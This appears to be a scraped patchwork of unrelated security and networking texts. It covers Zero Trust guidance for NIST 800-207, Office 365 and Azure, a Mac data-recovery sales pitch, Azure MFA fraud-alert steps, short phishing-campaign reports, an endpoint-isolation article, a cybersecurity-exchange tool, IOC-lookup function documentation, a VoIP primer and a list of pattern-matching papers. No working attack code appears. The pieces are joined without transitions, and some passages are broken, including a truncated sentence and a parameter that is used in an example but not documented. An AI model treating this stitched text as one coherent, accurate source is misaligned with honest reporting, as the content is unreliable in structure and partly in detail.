In May 2021, President Biden issued an executive order mandating that U.S. federal agencies adhere to NIST 800-207, a framework security professionals are already familiar with, as a required step for Zero Trust implementation. The standard has gone through heavy validation and input from a range of commercial customers, vendors, and government agency stakeholders, which is why many private organizations view it as the de facto standard for private enterprises.

However, pulling this type of framework off is no easy feat. One would need to have the following:
- Risk-based multi-factor authentication
- Identity protection
- Endpoint security
- Cloud workload technology to verify a user's or system's identity
- Consideration of access at that moment in time

Zero Trust is the new buzzword because more than 80% of all attacks involve credential use or misuse in the network. These credential-based attacks touch everything from identity stores and email security to web gateway providers. Zero Trust helps ensure greater password security, the integrity of accounts, adherence to organizational rules, and avoidance of high-risk shadow IT services.
Several times while using the system, you may come across a caution sign on Mac which frustrates you by restricting you from accessing required data. A number of warning signs can arise while using a Mac machine; a few appear when starting the computer, while others show up when accessing a file or folder. Among the different caution signs on Mac, some can appear in the form of a prohibitory sign, SMART monitor warnings, caution signs with logos, warnings with question marks, etc. Due to the appearance of such unexpected messages on the screen, users get tense and want to resolve them quickly, because they completely restrict users from accessing the related items. It is almost a data-loss situation, in which users can see their files on the Mac machine but are unable to open them. Some of the caution signs on Mac can be resolved manually, but this requires technical skill. If you have that kind of knowledge, then you can attempt it; but if you are unable to, and do not have a valid backup of the inaccessible files, then do not take the risk. It is better to leave this option and opt for Mac Data Recovery Software to regain access to files even after getting an unwanted caution sign on Mac OS X.
With the fraud alert feature, users can report fraudulent attempts to access their resources using their phone or the mobile app. This is an MFA Server (on-premises) feature. Fraud alerts are configured from the Azure portal, in the Azure Active Directory settings. Take the following steps:
- Navigate to the Azure portal by opening https://portal.azure.com.
- Select All services, then type Azure Active Directory in the search bar and open the settings.
- Under Security, select MFA.
- The Getting started blade is opened automatically. Under Settings, select Fraud alert.
- The Fraud alert settings page is opened. Here, you can enable users to submit fraud alerts.
- Click the Save button to save the settings.
When we think of Greek-themed malware, the trojan family generally comes to mind. Not anymore: Sigma is a new ransomware delivered via phishing email. With it being flu season, no one wants to hear that a new strain of the flu has been discovered, just as network defenders will not be excited that Locky ransomware has evolved yet again. This time, however, threat actors decided to add a darker theme to the code.

PhishMe® analyzes phishing attacks intended for corporate email all the time: phishing for corporate email credentials, malware delivery, etc. However, we also analyze phishing for consumer service credentials (think online shopping or Netflix), since it is also a part of the threat landscape.

On July 13, 2017, the Phishing Defense Center reviewed a phishing campaign delivering Hawkeye, a stealthy keylogger, disguised as a quote from the Pakistani government's employee housing society. Although it is actually a portable executable file, once downloaded it masquerades its icon as a PDF.

Phishing scams masquerading as PayPal are unfortunately commonplace. Most recently, the PhishMe Triage™ Managed Phishing Defense Center noticed a handful of campaigns using a new tactic for advanced PayPal credential phishing. The phishing website looks very authentic compared to off-the-shelf crimeware phishing kits, but it also levels up by asking for a photo of the victim holding their ID and credit card, presumably to create cryptocurrency accounts to launder money stolen from victims.

On May 22, 2017, PhishMe® received several emails with .ISO images as attachments via the Phishing Defense Center. ISO images are typically used as an archive format for the contents of an optical disk and are often utilized as installers for operating systems. In this case, however, a threat actor leveraged this archive format as a means to deliver malware to the recipients of their phishing email. Analysis of the attachments showed that this archive format was abused to deliver malicious AutoIt scripts hidden within a PE file that appears to be a Microsoft Office document file, which creates a process called MSBuild.exe and causes it to act as a Remote Access Trojan. AutoIt is a BASIC-like scripting language designed for automating Windows GUI tasks and general scripting. Like any scripting or programming language, it can be used for malicious purposes.
There’s no silver bullet when it comes to endpoint security. No matter how many security tools enterprises layer on, or how locked-down user devices are meant to be, determined cybercriminals can still ferret through the cracks. That’s why the best cybersecurity approach is to acknowledge that hackers will get through and to employ isolation solutions that limit your exposure and mitigate damage. In recent years, four isolation approaches have emerged as most promising: browser isolation, app sandboxing, physical air gap and virtual air gap. The best way to evaluate them for your needs is to view them from the user’s perspective, the IT admin’s perspective and, importantly, the attacker’s perspective. So here we go… This requires end-users to access the web via a browser application running on a locked-down virtual machine (VM) in the cloud. It blocks malicious web content from the endpoint device, which is a good thing. But while this frustrates attackers, it doesn’t stop them from exploiting other vulnerabilities, like email downloads, other applications, USBs and the device operating system (OS). From the end-users’ standpoint, having open web access is a big plus – no one wants to be blocked from the internet. Performance and reliability issues can crop up, however, and impact productivity. And IT admins have to deal with browser compatibility issues and potential attacks on those other endpoint areas. This entails executing an application in its own sandbox using virtual machines VMs or other application isolation techniques.Threats coming from a sandboxed application are contained so they can’t access the endpoint device’s OS or data. However, like browser isolation, this doesn’t protect other attack vectors from cybercriminals, including different versions of the same app, the many unsupported applications, the device’s OS, middleware, malicious external hardware or networks. Unfortunately for end-users, performance takes a hit. Each instance of each sandboxed application runs in a separate VM or other containerization solution, consuming resources on the device. Separating applications into VMs also creates inherent interoperability issues that require a lot of IT admin time to mitigate. Plus, because it’s time-consuming and costly to keep sandboxed apps up to date, security patches are often delayed and security risks rise. In short, app sandboxing may be a good first step for small organizations, but it causes more problems than it solves for enterprises that have dozens or hundreds of applications. Physical Air Gap A popular endpoint security strategy for people who have access rights to sensitive data, this requires two separate physical machines for each privileged user. One, commonly known as the Privileged Access Workstation (PAW), is dedicated solely to sensitive tasks and is locked down; the other unlocked machine is for day-to-day corporate work. Attackers have a very hard time penetrating sensitive data unless they have access to the machine itself. They can’t use popular internet or email entry points. And if external drivers like USBs are disabled on the PAW, they can’t get through that way either. Of course, cybercriminals who target the “corporate” machine will have more luck infiltrating that device, but they won’t be able to access the crown jewels, which is what they’re looking for in the first place. From end-user and IT admin viewpoints, physical air gaps have pretty significant downsides. 
End-users must physically move from one machine to another throughout the day, which can add up to several hours of lost productivity per week. And they have to lug two computers around. IT admins also have twice the burden and overhead, since they have double the number of devices to manage, with two very different permission settings.

Virtual Air Gap

A virtual air gap uses a single physical machine to deliver the same-grade security as a physical air gap. In this case, an end-user device is transformed into multiple, fully isolated virtual OS environments, or endpoints. Everything an end-user does happens in segregated, local OSes that run side by side, one of which can be locked down and dedicated to sensitive work while the other is open to internet and email. Attackers aren't enamored with the virtual air gap. It blocks them from taking over the device and accessing sensitive resources. Any attackers who penetrate the unlocked OS cannot see, access or control the sensitive VM. And if the unlocked OS is configured to be non-persistent, any malware that lands there disappears. But, as with a physical air gap, attackers who get their hands on the device itself can infiltrate via hardware backdoors. End-users, on the other hand, appreciate the performance and freedom a virtual air gap gives them. They can access, install and freely work with websites, apps, external devices like USBs, and cloud services without worrying about compromising their company's crown jewels. IT admins like how the virtual air gap eases their management burden. Because it protects some of the same attack vectors that other endpoint security approaches focus on, IT can eliminate several agents. Other security agents can be moved below the OS, where users cannot access, tweak or bypass them. Endpoint security doesn't have to be an oxymoron. By matching the right isolation technologies to your users, enterprises can keep sensitive data secure and users productive.

Tal Zamir, CTO, Hysolate
Cybex Information Exchange Tool (Cybiet) -- A Cybex Discovery and Cybex BEEP profile implementation The Cybersecurity Information Exchange Framework (CYBEX) will radically change the way cybersecurity entities interact with each other. To elaborate the framework in more technical detail, designers and practitioners of CYBEX will have to explore the design space thoroughly, while at the same time benchmarking the usefulness of the proposed framework in particular scenarios. For this reason, NICT implemented a cybersecurity information exchange tool (tentatively named Cybiet) that provides discovery and exchange functions, corresponding to the standards development of Cybex Discovery and the Cybex BEEP profile. Please note that this is an initial "proof of concept" implementation for exploration of both ideas and design space. As such, the breadth and depth of supported cybersecurity information elements are deliberately kept minimal. Usage scenarios of Cybex Discovery Cybex Discovery enables discovery of cybersecurity entities -- that is, mapping a resource identifier to an endpoint and its capabilities. We envision a better connected world where cybersecurity entities of various scales and diverse capabilities are registered to one of the registries -- either global, regional or private. Cybersecurity entities are enumerated in RDF/OWL format, and each cybersecurity organization aggregates such structured resource descriptions from accessible registries. Aggregated cybersecurity information is made discoverable through the Cybex Discovery server, which responds to discovery requests from clients by considering name, country and/or capability. Consider a situation where you have an ICT asset from a distant country whose vulnerability database is not widely known around you. With Cybex Discovery, you can discover the vulnerability database and make sure your ICT asset receives the appropriate vulnerability information. Technical details of Cybex Discovery This Cybex Discovery implementation focuses on the RDF/OWL decentralized mode of discovery; for this purpose, the Raptor RDF syntax library and the Rasqal RDF query library are used. A very simple registry-server implementation is provided for demonstration purposes, which stores RDF/OWL-based enumerations of cybersecurity entities. Usage scenarios of Cybiet BEEP Here we consider the scenario of an information feed from a security information service provider to several customers. Each customer, running the Cybex BEEP client, registers for an update feed from the security information service provider running the Cybex BEEP server; the Cybex BEEP server responds immediately with the current list of incident objects represented in IODEF. The Cybex BEEP server can periodically send updates to clients with the latest list of incident objects. It can also send an urgent notification to a specific customer at any point, if such a need arises. The Cybex BEEP client may request SPAM hosts, SPAM servers, Fast Flux hosts or Phishing hosts by specifying an information type. There are of course many other scenarios where this kind of flexible information feed is useful; these four types of information are defined in advance just to show some usage scenarios. Technical details of Cybiet BEEP The Cybex BEEP profile enables bidirectional exchange of structured cybersecurity information between a BEEP client and a BEEP server. Two or more cybersecurity entities are assumed to be connected by the Cybiet BEEP client/server. One end of the communicating peer may choose to become the BEEP client (connection initiator), and the other end may become the BEEP server (responder).
We assume that existing cybersecurity data sources act as HTTP servers; asynchronous notifications, if the need arises, may be sent to the BEEP server (and then to the BEEP client) directly. Cybiet BEEP is intended to be a "skinny, lightweight" implementation; it consists of XML data-binding, a prototypical BEEP profile, and an interface to an HTTP server. Most of the XML data-binding code is generated from the IODEF XML schema using CodeSynthesis XSD. The basic BEEP protocol stack is provided by the Vortex BEEP library from ASPL. The HTTP interface simply uses the libcurl HTTP library. Currently, only the IODEF XML schema (with CAPEC attack pattern IDs) is supported in this implementation. With XML namespaces, it becomes feasible to incorporate parts of XML-based enumeration standards into application-oriented standards like IODEF. In this implementation, we were interested in the implementation-level feasibility of exploiting this XML namespace capability. The BEEP profile implementation is also minimal. Through the implementation of the prototype BEEP profile, we were interested in the implementation-level feasibility of the rich modes of interaction that BEEP enables -- push mode as well as pull mode. Cybiet is written in C++ and can be downloaded from SourceForge. It should run on modern Linux distributions.
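For illustration, the incident objects carried over the BEEP channel are plain IODEF XML documents. The following is a minimal sketch of such a document, assuming the IODEF v1.0 schema (RFC 5070); the incident ID, contact name and timestamps are invented for illustration:

<?xml version="1.0" encoding="UTF-8"?>
<!-- Minimal, hypothetical IODEF incident; a real feed would carry richer data -->
<IODEF-Document version="1.00" lang="en"
    xmlns="urn:ietf:params:xml:ns:iodef-1.0">
  <Incident purpose="reporting">
    <IncidentID name="csirt.example.com">189493</IncidentID>
    <ReportTime>2011-03-01T09:00:00+09:00</ReportTime>
    <Assessment>
      <Impact type="recon" completion="failed"/>
    </Assessment>
    <Contact role="creator" type="organization">
      <ContactName>Example CSIRT</ContactName>
    </Contact>
  </Incident>
</IODEF-Document>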
Look up IOCs (Indicators of Compromise) of IP addresses, URLs and domains in a local copy of CrowdStrike's curated database of IOCs and annotate the events with the associated security information. The function takes the following parameters (parameter names reconstructed from the usage examples below):

| Parameter | Type | Required | Default | Description |
| --- | --- | --- | --- | --- |
| field | [string] | true | | The field(s) containing either IP addresses, URLs or domains to check for IOCs. |
| confidenceThreshold | string | false | high | The lowest level of confidence of IOCs to consider. |
| include | [string] | false | All columns | Specifies the columns from the IOC database to include (see the output columns below). |
| prefix | string | false | ioc | Prefix for the names of all the output fields. |
| type | string | true | | Specifies the type of IOCs to look for: ip_address, url or domain. |

If any of the selected fields match an IOC, the field <prefix>.detected will be added with the value true, where <prefix> is the value of the prefix argument. Also, for each field matching an IOC, fields of the form <prefix>[<index>].<column> will be added, where <index> is the first unused index, starting with 0, and <column> is one of the column names selected. IP addresses can be either IPv4 or IPv6 addresses. Short-hand notation for IPv6 addresses is supported and can be matched against non-short-hand notation. URLs and domains use case-insensitive string matching. The function can be negated, but only with. For information about how to configure the IOC database, see IOC Configuration. The output columns are:

| Column | Type | Description |
| --- | --- | --- |
| indicator | string | The IOC that was found in the event field. |
| type | string | The type of IOC detected: ip_address, url or domain. |
| published_date | Timestamp in Unix time, UTC | The date the IOC was first published. |
| last_updated | Timestamp in Unix time, UTC | The date the IOC was last updated. |
| malicious_confidence | string | The confidence level by which an IOC is considered to be malicious. Will change over time. |
| labels | string | Detailed information about the IOC, see below. |

labels contains a comma-separated list of labels that provide additional context around an indicator. The labels have the form category/value. The categories are: Actors Have the form "Actor/...". The named actor that the indicator is associated with (e.g. "Panda", "Bear", "Spider", etc.). Malware Families Have the form "Malware/...". Indicates the malware family an indicator has been associated with (e.g. "Malware/PoisonIvy", "Malware/Zeus", "Malware/DarkComet", etc.). An indicator may be associated with more than one malware family. Kill Chain Have the form "KillChain/...". The point in the kill chain at which an indicator is associated. Reconnaissance: This indicator is associated with the research, identification, and selection of targets by a malicious actor. Weaponization: This indicator is associated with assisting a malicious actor create malicious content. Delivery: This indicator is associated with the delivery of an exploit or malicious payload. Exploitation: This indicator is associated with the exploitation of a target system or environment. Installation: This indicator is associated with the installation or infection of a target system with a remote access tool or other tool allowing for persistence in the target environment. C2 (Command and Control): This indicator is associated with malicious actor command and control. ActionOnObjectives: This indicator is associated with a malicious actor's desired effects and goals. Domain Types Have the form "DomainType/...". ActorControlled: It is believed the malicious actor is still in control of this domain. DGA: This domain is the result of malware utilizing a domain generation algorithm. DynamicDNS: This domain is owned or used by a dynamic DNS service. DynamicDNS/Afraid: This domain is owned or used by the Afraid.org dynamic DNS service.
DynamicDNS/DYN: This domain is owned or used by the DYN dynamic DNS service. DynamicDNS/Hostinger: This domain is owned or used by the Hostinger dynamic DNS service. DynamicDNS/noIP: This domain is owned or used by the NoIP dynamic DNS service. DynamicDNS/Oray: This domain is owned or used by the Oray dynamic DNS service. KnownGood: The domain itself (or the domain portion of a URL) is known to be legitimate, despite having been associated with malware or malicious activity. LegitimateCompromised: This domain does not typically pose a threat but has been compromised by a malicious actor and may be serving malicious content. PhishingDomain: This domain has been observed to be part of a phishing campaign. Sinkholed: The domain is being sinkholed, likely by a security research team. This indicates that, while traffic to the domain likely has a malicious source, the IP address to which it is resolving is controlled by a legitimate 3rd party. It is no longer believed to be under the control of the actor. StrategicWebCompromise: While similar to the DomainType/LegitimateCompromised label, this label indicates that the activity is of a more targeted nature. Oftentimes, targeted attackers will compromise a legitimate domain that they know to be a watering hole frequently visited by the users at the organizations they are looking to attack. Unregistered: The domain is not currently registered with any registrars. IP Address Types Have the form "IPAddressType/...". HtranDestinationNode: An IP address with this label is being used as a destination address with the HTran Proxy Tool. HtranProxy: An IP address with this label is being used as a relay or proxy node with the HTran Proxy Tool. LegitimateCompromised: It is suspected an IP address with this label is compromised by malicious actors. Parking: This IP address is likely being used as a parking IP address. PopularSite: This IP address could be utilized for a variety of purposes and may appear more frequently than other IPs. SharedWebHost: This IP address may be hosting more than one website. Sinkhole: This IP address is likely a sinkhole being operated by a security researcher or vendor. TorProxy: This IP address is acting as a TOR (The Onion Router) proxy. Statuses Have the form "Status/...". ConfirmedActive: This indicator is likely to be currently supporting malicious activity. ConfirmedInactive: This indicator is no longer used for malicious purposes. Historic: The indicator is no longer used for malicious purposes but could be used again in the future. Targets Have the form "Target/...". The activity associated with this indicator is known to target the indicated vertical sector. Threat Types Have the form "ThreatType/...". ClickFraud: This indicator is used by actors engaging in click or ad fraud. Commodity: This indicator is used with commodity-type malware such as Zeus or Pony Downloader. PointOfSale: This indicator is associated with activity known to target point-of-sale machines such as AlinaPoS or BlackPoS. Ransomware: This indicator is associated with ransomware malware such as Cryptolocker or Cryptowall. Suspicious: This indicator is not currently associated with a known threat type but should be considered suspicious. Targeted: This indicator is associated with a known actor suspected to be associated with a nation-state, such as DEEP PANDA or ENERGETIC BEAR. TargetedCrimeware: This indicator is associated with a known actor suspected to be engaging in criminal activity, such as WICKED SPIDER. Vulnerabilities Have the form "Vulnerability/...".
The CVE-XXXX-XXX vulnerability the indicator is associated with (e.g. "Vulnerability/CVE-2012-0158"). If you use this function in a query and it does not produce any IOC results, it can be hard to tell whether there were no results or there is an error in the query. To help with that, we provide some sample IOCs that you can test your query with. Note that since the IOC database is updated constantly, we cannot guarantee that these remain in the database. If you believe that one of them is no longer in the database, please contact us. Also, the malicious_confidence of these IOCs will probably be lowered over time. If you have a query using the ioc:lookup() function on the field client_ip, you can alter that query and add client_ip:="126.96.36.199" to the query before the ioc:lookup() function to have it match a known IOC. You might need to add confidenceThreshold="low" as an argument to the ioc:lookup() function in order to find this IOC. Look up IP address IOCs for the field ip and annotate events with the associated security information. Only include the columns malicious_confidence and labels: ioc:lookup("ip", type="ip_address", include=["malicious_confidence", "labels"]) Use the prefix detection as the prefix for any added fields: ioc:lookup("ip", type="ip_address", prefix="detection") Look up URL IOCs for the field url and search IOCs of all confidence levels: ioc:lookup("url", type="url", confidenceThreshold="low") Look up URL IOCs for the field url and only keep the events containing an IOC. Useful for finding IOCs in queries used for alerts or scheduled searches: ioc:lookup("url", type="url", strict=true)
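As a sketch of the test recipe just described (assuming a field named client_ip, the sample IOC above, and the default prefix ioc), the assembled query could look like this:

client_ip := "126.96.36.199"
| ioc:lookup("client_ip", type="ip_address", confidenceThreshold="low")
| ioc.detected = true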
NETWORK TELEPHONY – VOICE OVER INTERNET PROTOCOL (VoIP) VoIP is a set of technologies that enable voice calls to be carried over the internet (or other networks designed for data), rather than the traditional telephone landline system, the Public Switched Telephone Network (PSTN). VoIP uses IP protocols, originally designed for the internet, to break voice calls up into digital ‘packets’. For a call to take place, the separate packets travel over an IP network and are reassembled at the far end. The breakthrough was in being able to transmit voice calls, which are much more sensitive to any time delays or problems on the network, in the same way as data. Packetised voice also enables much more efficient use of the network, because bandwidth is only used when something is actually being transmitted. Also, the network can handle connections from many applications and many users at the same time, unlike the dedicated circuit-switched approach. The basic process involved in a VoIP call is as follows:
- Conversion of the caller’s analogue voice signal into a digital format.
- Compression and translation of the digital signal into discrete Internet Protocol packets.
- Transmission of the packets over the Internet or other IP-based network.
- Reverse translation of the packets into an analogue voice signal for the call recipient.
The digitisation and transmission of the analogue voice as a stream of packets is carried out over a digital data network that can carry data packets using IP and other, related Internet protocols. This network may be an organisation’s internal LAN, a leased network, the PSTN or the open Internet. The compression process is carried out by a codec, a voice-encoding algorithm, which allows the call to be transmitted over the IP network within the network’s available bandwidth. To make a VoIP call, the consumer requires VoIP software and a broadband connection to the Internet. The software will handle the call...
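To make the packetisation step concrete, here is a toy sketch in Python (not a real VoIP stack; the address, port and 12-byte header layout are invented for illustration). It slices 20 ms frames of raw 8 kHz, 16-bit mono audio into sequence-numbered UDP datagrams that the far end could reorder and reassemble:

import socket
import struct

SAMPLE_RATE = 8000            # 8 kHz narrowband voice
BYTES_PER_SAMPLE = 2          # 16-bit PCM
FRAME_MS = 20                 # one packet per 20 ms of speech
FRAME_BYTES = SAMPLE_RATE * BYTES_PER_SAMPLE * FRAME_MS // 1000   # 320 bytes

def send_call_audio(pcm: bytes, dest=("192.0.2.10", 5004)):
    """Chop a PCM byte stream into sequence-numbered voice packets."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for seq, offset in enumerate(range(0, len(pcm), FRAME_BYTES)):
        frame = pcm[offset:offset + FRAME_BYTES]
        timestamp_ms = seq * FRAME_MS                   # ms since call start
        header = struct.pack("!IQ", seq, timestamp_ms)  # 4-byte seq + 8-byte time
        sock.sendto(header + frame, dest)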
String Pattern Matching and Tools for Analyzing Code Brenda S. Baker - Software tools and algorithms for analyzing source code I developed a theory of parameterized string pattern matching, described in [2, 4, 6-7, 11], for "parameterized strings" (p-strings) that can contain special parameter symbols. If two such strings are a parameterized match (p-match), it is possible to transform one into the other by systematically replacing parameters in one string by different parameters in the other, analogous to renaming a variable consistently everywhere throughout a region of code. Given source code and a threshold length set by the user, Dup [5, 6, 8, 11] finds all pairs of maximal regions that are over the threshold length and are either identical textually or are p-matches. Dup can also be used to find exact duplication in text or genomic data. A scatter plot produced by Dup for a million-line production subsystem is shown here. Pairs of similar sections of code are sometimes called "clones." An analysis of results from a joint experiment with other software tools for finding clones is given in . Pdiff finds the smallest edit distance between two source files based on edit operations of insertion, deletion, and p-match. It generates HTML to display the two files side by side with the differences marked. The algorithm is given in . - Software tools for analyzing executables without access to source code - Identifying related executables Compiling related Java programs can result in very different bytecode files, when these files are viewed as raw bytes. In order to identify bytecode files from related source files without access to the source, several techniques were used to adapt Dup (above), Udi Manber's tool Siff, and the UNIX utility Diff to deal with bytecode files. Our tools make it possible to find similarities among thousands of bytecode files, or to compare one new file to an index of many old ones. Possible applications include detection of plagiarized code, software reuse, program management, and uninstallers. - Exediff - patch files for executables For source files, updates are commonly distributed as patches. When source code can't be given out or when data transmission rates are slow, it would be convenient to distribute updates to executables as patch files as well. The difficulty is that when primary changes are made to source code, secondary changes (e.g. in pointers or jumps) can propagate throughout the executable. Exediff uses heuristics to reconstruct secondary changes where possible in order to keep patch files small. For the Alpha architecture, a comparison of the sizes of gzipped patch files created by Exediff and a utility that compares raw bytes showed that Exediff generally saved a factor of two for major version changes and a factor of five for minor version changes . I also implemented a version of Exediff for Java bytecode files. Selected Papers on String Pattern Matching and the above projects Brenda S. Baker, Finding Clones with Dup: Analysis of an Experiment, IEEE Trans. on Software Engineering 33,9, Sept. 2007, pp. 608-621. gzipped PostScript Brenda S. Baker and Raffaele Giancarlo, Sparse Dynamic Programming for Longest Common Subsequence from Fragments, J. Algorithms 42,2, 2002, pp. 231-254. gzipped PostScript Brenda S. Baker, Udi Manber, and Robert Muth, Compressing Differences of Executable Code, in Proc. of the ACM SIGPLAN 1999 Workshop on Compiler Support for System Software (WCSSS'99), 1999, pp. 1-10. gzipped PostScript Brenda S. Baker, Parameterized Diff, Proc.
of ACM-SIAM Symposium on Discrete Algorithms (SODA), Jan. 1999, pp. S854-S855. gzipped PostScript Brenda S. Baker and Udi Manber, Deducing Similarities in Java Sources from Bytecodes, in Proc. of the USENIX Annual Technical Conference, 1998, pp. 179-190. gzipped PostScript Brenda S. Baker and Raffaele Giancarlo, Longest Common Subsequence from Fragments via Sparse Dynamic Programming, Algorithms: 6th European Symposium Proceedings (ESA '98), Lecture Notes in Computer Science 1461, 1998, pp. 79-90. Brenda S. Baker, Parameterized Duplication in Strings: Algorithms and an Application to Software Maintenance, SIAM J. on Computing 26,5, Oct. 1997, pp. 1343-1362. Brenda S. Baker, Parameterized String Pattern Matching, JCSS 52,1, Feb. 1996, pp. 28-42. Brenda S. Baker, Parameterized Pattern Matching by Boyer-Moore-type Algorithms, Proc. of the Sixth ACM-SIAM Symposium on Discrete Algorithms (SODA), 1995, pp. 541-550. Brenda S. Baker, On Finding Duplication and Near-Duplication in Large Software Systems, Proc. of the Second Working Conf. on Reverse Engineering, 1995, pp. 86-95. Received IEEE Outstanding Paper Award. gzipped PostScript Brenda S. Baker, A Theory of Parameterized Pattern Matching: Algorithms and Applications (Extended Abstract), Proceedings of the 25th ACM Symposium on Theory of Computing (STOC '93), 1993, pp. 71-80. gzipped PostScript
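As a toy illustration of the p-match idea described above (a sketch using the standard "prev-encoding" formulation from the parameterized-matching literature, not Baker's actual implementation): two p-strings p-match exactly when, after each parameter occurrence is rewritten as the distance back to that parameter's previous occurrence (0 for a first occurrence), the encoded sequences are equal. All names here are invented:

def prev_encode(tokens, is_param):
    """Replace each parameter token by the distance to its previous
    occurrence (0 if first); keep ordinary tokens unchanged."""
    last_seen = {}
    out = []
    for i, tok in enumerate(tokens):
        if is_param(tok):
            out.append(i - last_seen[tok] if tok in last_seen else 0)
            last_seen[tok] = i
        else:
            out.append(tok)
    return out

def p_match(a, b, is_param):
    return prev_encode(a, is_param) == prev_encode(b, is_param)

# "x = x + y" p-matches "u = u + v" but not "u = v + v"
is_param = str.islower
print(p_match(["x", "=", "x", "+", "y"], ["u", "=", "u", "+", "v"], is_param))  # True
print(p_match(["x", "=", "x", "+", "y"], ["u", "=", "v", "+", "v"], is_param))  # False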
What is Zero Trust? Zero Trust is a security approach that mandates verification, employs least privilege, and operates under the assumption of a breach for every access request to a private network, irrespective of its origin or destination. Its foundation rests on several principles to improve your security:
- Explicit Verification: All access attempts are authenticated and authorized based on a comprehensive set of data points, including user identity, location, device health, service or workload, data classification, and anomalies.
- Least Privilege Access: Access is restricted to the bare minimum necessary using techniques such as just-in-time and just-enough access (JIT/JEA), risk-based adaptive policies, and data protection measures, thus securing both data and productivity.
- Assume Breach: To minimize the impact of potential breaches, access is segmented, and the blast radius is reduced. End-to-end encryption is validated, and analytics are utilized for visibility, threat detection, and defense enhancement.
Zero Trust extends across six core elements:
- Identities: People, services, and IoT components are verified and authorized based on multiple data points, such as user identity, location, and device health.
- Devices: Endpoints accessing the network are monitored for compliance with device health standards and updated regularly.
- Apps and APIs: Applications and services running on the network are secured with appropriate permissions, configurations, and vulnerability scans.
- Data: Information flowing through the network is protected using encryption, classification, and access policies, while anomalies are monitored.
- Infrastructure: Physical and virtual resources hosting the network are hardened against attacks and segmented to minimize breach impact.
- Networks: Connections between elements are controlled using segmentation, encryption, and analysis, and verified end-to-end.
This approach requires a comprehensive and integrated security strategy encompassing the entire digital infrastructure. Some benefits of Zero Trust security include:
- Enhanced Employee Experience: Employees can securely work from any location and on any device.
- Facilitated Digital Transformation: Intelligent security supports complex and hybrid environments.
- Reduced Vulnerabilities: Granular policies and closed security gaps minimize security risks and lateral movement.
- Protection from Threats: Layered defense explicitly verifies all access requests, safeguarding against internal and external threats.
- Regulatory Compliance: Helps comply with evolving regulatory requirements by offering a consistent and transparent data protection strategy.
How does it work in Office 365? Zero Trust works in Office 365 by applying the following security capabilities:
- Conditional Access: This allows you to enforce granular policies based on user, device, app, location, and risk factors. For example, you can require multifactor authentication, device compliance, or app protection for accessing specific resources or data.
- App protection policies: This allows you to protect the data within Office 365 apps on mobile devices, such as Outlook, Word, Excel, etc. For example, you can restrict copy-paste, screen capture, or external sharing of sensitive data.
- Device compliance policies: This allows you to check the health and compliance status of devices that access Office 365. For example, you can require devices to have a PIN, encryption, antivirus, or the latest updates.
- Microsoft Defender for Office 365: This provides threat protection and intelligence for Office 365 apps and services, such as email, SharePoint, Teams, etc. For example, it can detect and block phishing, malware, ransomware, or spoofing attacks.
How to apply Zero Trust principles to Azure infrastructure as a service (IaaS)? Zero Trust in the context of Infrastructure as a Service (IaaS) in Azure refers to a security model where no implicit trust is granted to assets based on their location (inside or outside the network) or on their identity (whether they are external or internal users). In a traditional security model, once someone gains access to the network, they might be trusted to access various resources within that network. Zero Trust, on the other hand, assumes that threats could come from both inside and outside the network, and thus, trust should not be granted based solely on the user’s location or identity. In Azure IaaS, Zero Trust is implemented through various security measures and technologies:
- Identity and Access Management (IAM): Azure Active Directory (AAD) is often used to manage user identities and their access to Azure resources. With Zero Trust, access controls are enforced based on a user’s identity, their role, and other contextual factors such as the device being used and the location from which the access is attempted.
- Multi-Factor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide multiple forms of authentication before granting access. This could include something they know (like a password) and something they have (like a mobile device for receiving a verification code).
- Conditional Access Policies: Azure allows administrators to define policies that control access to resources based on certain conditions, such as the user’s location, device health, or the sensitivity of the resource being accessed. This ensures that access is granted only when specific conditions are met.
- Network Segmentation: Azure Virtual Networks (VNETs) can be segmented into smaller, isolated networks using Network Security Groups (NSGs) and Virtual Network Service Endpoints (VNET service endpoints). This helps in minimizing the attack surface and containing potential breaches within specific segments of the network.
- Encryption: Azure offers various encryption options to protect data both at rest and in transit. This includes Azure Disk Encryption for encrypting virtual machine disks, Azure Storage Service Encryption for encrypting data stored in Azure Storage, and Azure VPN Gateway for encrypted communication between virtual networks.
- Continuous Monitoring and Threat Detection: Azure Security Center provides continuous monitoring of Azure resources and detects potential security threats using advanced analytics and machine learning algorithms. It can identify suspicious activities and recommend actions to mitigate risks.
- Just-In-Time (JIT) Access: Azure Security Center allows administrators to restrict access to Azure VMs by enabling JIT access. This means that access to VMs is only granted when needed and for a limited time window, reducing the attack surface and minimizing the risk of unauthorized access.
What are the key success factors to set up a Zero Trust Model in your company? Instead of assuming everything behind the corporate firewall is safe, the Zero Trust model assumes breach and verifies each request as though it originates from an open network.
Regardless of where the request originates or what resource it accesses, Zero Trust teaches us to “never trust, always verify.” Every access request is fully authenticated, authorized, and encrypted before granting access. Microsegmentation and least-privilege access principles are applied to minimize lateral movement. Rich intelligence and analytics are utilized to detect and respond to anomalies in real time. Zero Trust should cover your whole digital environment—including identities, endpoints, network, data, apps, and infrastructure. Zero Trust architecture is a complete end-to-end plan that needs integration across the elements. The basis of Zero Trust security is identities. Both human and non-human identities need strong authorization, connecting from either personal or corporate endpoints with compliant devices, asking for access based on strong policies grounded in the Zero Trust principles of explicit verification, least-privilege access, and assumed breach. As a unified policy enforcement point, the Zero Trust policy stops the request, explicitly verifies signals from all six basic elements based on policy configuration, and allows least-privilege access. Signals include the user’s role, location, device compliance, data sensitivity, and app sensitivity. Besides telemetry and state information, the risk assessment from threat protection feeds into the policy engine to automatically deal with threats in real time. Policy is applied at the time of access and continuously checked throughout the session. This policy is further improved by policy optimization. Governance and compliance are essential to a strong Zero Trust implementation. Security posture assessment and productivity optimization are needed to measure the telemetry across the services and systems. The telemetry and analytics feed into the threat protection system. Large amounts of telemetry and analytics enriched by threat intelligence produce high-quality risk assessments that can be either manually investigated or automated. Attacks occur at cloud speed and, because humans can’t react fast enough or go through all the risks, your defense systems must also act at cloud speed. The risk assessment feeds into the policy engine for real-time automated threat protection and additional manual investigation if needed. Traffic filtering and segmentation is applied to the evaluation and enforcement from the Zero Trust policy before access is given to any public or private network. Data classification, labeling, and encryption should be applied to emails, documents, and structured data. Access to apps should be adaptive, whether SaaS or on-premises. Runtime control is applied to infrastructure with serverless, containers, IaaS, PaaS, and internal sites, with just-in-time (JIT) and version controls actively engaged. Finally, telemetry, analytics, and assessment from the network, data, apps, and infrastructure are fed back into the policy optimization and threat protection systems.
